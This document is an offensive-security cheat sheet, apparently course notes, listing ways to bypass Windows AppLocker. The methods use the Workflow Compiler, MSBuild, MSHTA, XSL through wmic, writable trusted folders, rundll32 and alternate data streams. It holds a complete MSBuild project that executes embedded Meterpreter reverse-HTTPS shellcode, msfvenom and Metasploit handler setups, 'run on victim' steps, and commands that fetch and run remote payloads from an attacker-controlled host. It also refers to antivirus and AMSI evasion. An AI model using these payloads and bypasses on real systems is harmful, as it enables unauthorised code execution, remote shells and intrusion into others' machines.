Note: AppLocker rules do not apply to the built-in local accounts such as Local System, Local Service, or Network Service. Neither do they apply to the IIS DefaultAppPool account

Arbitrary C# Using Workflow Compiler

  1. Run the following PowerShell code:
$workflowexe = "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
$workflowasm = [Reflection.Assembly]::LoadFrom($workflowexe)
$SerializeInputToWrapper = [Microsoft.Workflow.Compiler.CompilerWrapper].GetMethod('SerializeInputToWrapper', [Reflection.BindingFlags] 'NonPublic, Static')
Add-Type -Path 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Workflow.ComponentModel.dll'
$compilerparam = New-Object -TypeName Workflow.ComponentModel.Compiler.WorkflowCompilerParameters
$compilerparam.GenerateInMemory = $True
$pathvar = "test.txt"
$output = "C:\Tools\run.xml"
$tmp = $SerializeInputToWrapper.Invoke($null, @([Workflow.ComponentModel.Compiler.WorkflowCompilerParameters] $compilerparam, [String[]] @(,$pathvar)))
Move-Item $tmp $output

2. Then the following (change student to the actual username). You need to run this as admin. If fail also can try to continue:

$Acl = Get-ACL $output;$AccessRule= New-Object System.Security.AccessControl.FileSystemAccessRule(“student”,”FullControl”,”none”,”none","Allow");$Acl.AddAccessRule($AccessRule);Set-Acl $output $Acl

3. Create test.txt with the following C# code:

using System;
using System.Workflow.ComponentModel;
public class Run : Activity{
    public Run() {
        Console.WriteLine("I executed!");
    }
}

4. Run the following command using cmd:

C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe run.xml results.xml

Arbitrary C# shellcode using MSBuild

  1. Generate shellcode using msfvenom:
    msfvenom -p windows/x64/meterpreter/reverse_https LHOST=IP LPORT=PORT EXITFUNC=thread -f csharp

  2. Save the following file as test.csproj with the shellcode replaced:

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes x64 shellcode. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
  <!-- Save This File And Execute The Above Command -->
  <!-- Author: Casey Smith, Twitter: @subTee --> 
  <!-- License: BSD 3-Clause -->
  <Target Name="Hello">
    <ClassExample />
  </Target>
  <UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
    
      <Code Type="Class" Language="cs">
      <![CDATA[
        using System;
        using System.Runtime.InteropServices;
        using Microsoft.Build.Framework;
        using Microsoft.Build.Utilities;
        public class ClassExample :  Task, ITask
        {      
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize,
      uint flAllocationType, uint flProtect);

        [DllImport("kernel32.dll")]
        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize,
          IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        [DllImport("kernel32.dll")]
        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

          public override bool Execute()
          {
            byte[] buf = new byte[764] {0xfc,0x48,0x83,0xe4,0xf0,0xe8,
0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x48,0x31,0xd2,
0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x51,0x48,0x8b,
0x52,0x20,0x56,0x48,0x0f,0xb7,0x4a,0x4a,0x48,0x8b,0x72,0x50,
0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,
0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x48,
0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x41,0x51,0x66,
0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,
0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
0xd0,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0x50,
0xe3,0x56,0x4d,0x31,0xc9,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,
0x48,0x01,0xd6,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,
0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,
0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,
0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
0x4b,0xff,0xff,0xff,0x5d,0x48,0x31,0xdb,0x53,0x49,0xbe,0x77,
0x69,0x6e,0x69,0x6e,0x65,0x74,0x00,0x41,0x56,0x48,0x89,0xe1,
0x49,0xc7,0xc2,0x4c,0x77,0x26,0x07,0xff,0xd5,0x53,0x53,0x48,
0x89,0xe1,0x53,0x5a,0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x53,0x53,
0x49,0xba,0x3a,0x56,0x79,0xa7,0x00,0x00,0x00,0x00,0xff,0xd5,
0xe8,0x0f,0x00,0x00,0x00,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,
0x2e,0x34,0x35,0x2e,0x31,0x39,0x31,0x00,0x5a,0x48,0x89,0xc1,
0x49,0xc7,0xc0,0x05,0x0d,0x00,0x00,0x4d,0x31,0xc9,0x53,0x53,
0x6a,0x03,0x53,0x49,0xba,0x57,0x89,0x9f,0xc6,0x00,0x00,0x00,
0x00,0xff,0xd5,0xe8,0xd1,0x00,0x00,0x00,0x2f,0x47,0x6c,0x45,
0x37,0x5f,0x34,0x69,0x73,0x33,0x2d,0x48,0x79,0x46,0x66,0x4d,
0x58,0x6c,0x57,0x39,0x55,0x73,0x67,0x62,0x38,0x33,0x71,0x2d,
0x57,0x65,0x56,0x2d,0x52,0x72,0x68,0x4e,0x42,0x65,0x46,0x5f,
0x33,0x41,0x74,0x49,0x63,0x67,0x53,0x42,0x4f,0x57,0x66,0x59,
0x61,0x39,0x6e,0x4a,0x38,0x5f,0x54,0x4a,0x4f,0x44,0x74,0x49,
0x57,0x55,0x74,0x50,0x6e,0x6e,0x43,0x59,0x32,0x6f,0x52,0x35,
0x46,0x41,0x33,0x41,0x56,0x67,0x74,0x4e,0x30,0x6c,0x30,0x4e,
0x4d,0x53,0x66,0x42,0x78,0x79,0x66,0x33,0x53,0x72,0x39,0x78,
0x47,0x6e,0x53,0x43,0x57,0x78,0x67,0x30,0x64,0x67,0x51,0x48,
0x65,0x53,0x59,0x79,0x64,0x78,0x56,0x5a,0x66,0x2d,0x33,0x47,
0x71,0x56,0x36,0x51,0x61,0x36,0x4c,0x6e,0x41,0x64,0x6b,0x52,
0x63,0x32,0x44,0x67,0x43,0x55,0x33,0x54,0x74,0x4f,0x4c,0x61,
0x5f,0x62,0x71,0x33,0x78,0x46,0x64,0x68,0x43,0x50,0x53,0x37,
0x30,0x32,0x32,0x39,0x6c,0x44,0x76,0x46,0x74,0x56,0x2d,0x63,
0x47,0x61,0x44,0x50,0x31,0x77,0x6a,0x49,0x51,0x4d,0x70,0x39,
0x59,0x45,0x69,0x4a,0x49,0x76,0x49,0x7a,0x37,0x6d,0x6a,0x58,
0x5f,0x6e,0x42,0x50,0x69,0x4f,0x56,0x57,0x6e,0x45,0x52,0x72,
0x00,0x48,0x89,0xc1,0x53,0x5a,0x41,0x58,0x4d,0x31,0xc9,0x53,
0x48,0xb8,0x00,0x32,0xa8,0x84,0x00,0x00,0x00,0x00,0x50,0x53,
0x53,0x49,0xc7,0xc2,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x48,0x89,
0xc6,0x6a,0x0a,0x5f,0x48,0x89,0xf1,0x6a,0x1f,0x5a,0x52,0x68,
0x80,0x33,0x00,0x00,0x49,0x89,0xe0,0x6a,0x04,0x41,0x59,0x49,
0xba,0x75,0x46,0x9e,0x86,0x00,0x00,0x00,0x00,0xff,0xd5,0x4d,
0x31,0xc0,0x53,0x5a,0x48,0x89,0xf1,0x4d,0x31,0xc9,0x4d,0x31,
0xc9,0x53,0x53,0x49,0xc7,0xc2,0x2d,0x06,0x18,0x7b,0xff,0xd5,
0x85,0xc0,0x75,0x1f,0x48,0xc7,0xc1,0x88,0x13,0x00,0x00,0x49,
0xba,0x44,0xf0,0x35,0xe0,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,
0xff,0xcf,0x74,0x02,0xeb,0xaa,0xe8,0x55,0x00,0x00,0x00,0x53,
0x59,0x6a,0x40,0x5a,0x49,0x89,0xd1,0xc1,0xe2,0x10,0x49,0xc7,
0xc0,0x00,0x10,0x00,0x00,0x49,0xba,0x58,0xa4,0x53,0xe5,0x00,
0x00,0x00,0x00,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,
0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0x00,0x20,0x00,
0x00,0x49,0x89,0xf9,0x49,0xba,0x12,0x96,0x89,0xe2,0x00,0x00,
0x00,0x00,0xff,0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb2,
0x66,0x8b,0x07,0x48,0x01,0xc3,0x85,0xc0,0x75,0xd2,0x58,0xc3,
0x58,0x6a,0x00,0x59,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0x89,0xda,
0xff,0xd5};

            int size = buf.Length;

            IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);

            Marshal.Copy(buf, 0, addr, size);

            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);

            WaitForSingleObject(hThread, 0xFFFFFFFF);

            return true;
          } 
        }     
      ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

3. Ready for shell:

msfconsole -q
use multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost IP
set lport PORT
set EnableStageEncoding true
set StageEncoder x64/xor_dynamic
exploit

4. Run the following on victim:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe test.csproj

Arbitrary JScript Using MSHTA

  1. Create the .js file using method listed in Antivirus Evasion -> Methods -> Full Process Hollowing + AMSI with Jscript.

  2. Slightly modify the .js file content as below:

<html> 
<head>
</head> 
<body>
<script language="JScript">

ORIGINAL JS FILE CONTENT HERE

</script>
</body> 
</html>

3. Rename the file to runner.hta

4. Prepare for shell:

msfconsole -q
use multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost IP
set lport PORT
set EnableStageEncoding true
set StageEncoder x64/xor_dynamic
exploit

5a. Execute (important, must use full path!)
mshta c:\users\offsec\documents\runner.hta

5b. Or to create a shortcut, right click on desktop and select New -> Shortcut:
C:\Windows\System32\mshta.exe http://IP/runner.hta

Arbitrary JScript Using XSL

  1. Create the .js file using method listed in Antivirus Evasion -> Methods -> Full Process Hollowing + AMSI with Jscript.

  2. Slightly modify the .js file content as below:

<?xml version='1.0'?>
<stylesheet version="1.0"
xmlns="http://www.w3.org/1999/XSL/Transform"
xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">

<output method="text"/>
	<ms:script implements-prefix="user" language="JScript">
		<![CDATA[

        ORIGINAL JS FILE CONTENT HERE

        ]]>
	</ms:script>
</stylesheet>

3. Rename the file to runner.xsl, and host it on your Kali machine. Remember to do:
sudo systemctl restart apache2

4. Prepare for shell:

msfconsole -q
use multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost IP
set lport PORT
set EnableStageEncoding true
set StageEncoder x64/xor_dynamic
exploit

5. Run the following in victim:
wmic process get brief /format:"http://IP/runner.xsl"

Trusted Folder Bypass

  1. Use SysInternals AccessChk to check writable folder under C:\Windows. These means writable. Also can check the following:
    C:\Program Files
    C:\Program Files (x86)
accesschk.exe "username" C:\Windows -wus

  1. Next use icacls from results above to check if it is executable (in this example C:\Windows\Task). If RX means can write and can execute.: icacls.exe C:\Windows\Tasks

  2. Can just copy shellcode to this folder to bypass AppLocker.

Bypass with DLL

  1. If DLL block is not enabled, can just use DLL to bypass it (in example below the function name in DLL is run). rundll32 C:\Tools\TestDll.dll,run

Alternate Data Streams

  1. First you need to find a writable and executable file and in trusted location (similar to Trusted Folder Bypass). Then write your exploit js into it: type test.js > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:test.js"

  2. Excute it using wscript: wscript "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:test.js"

Third Party Execution

  1. VBA Code in Microsoft Office, Python, Perl, Java and other third party scripting engine can always bypass AppLocker.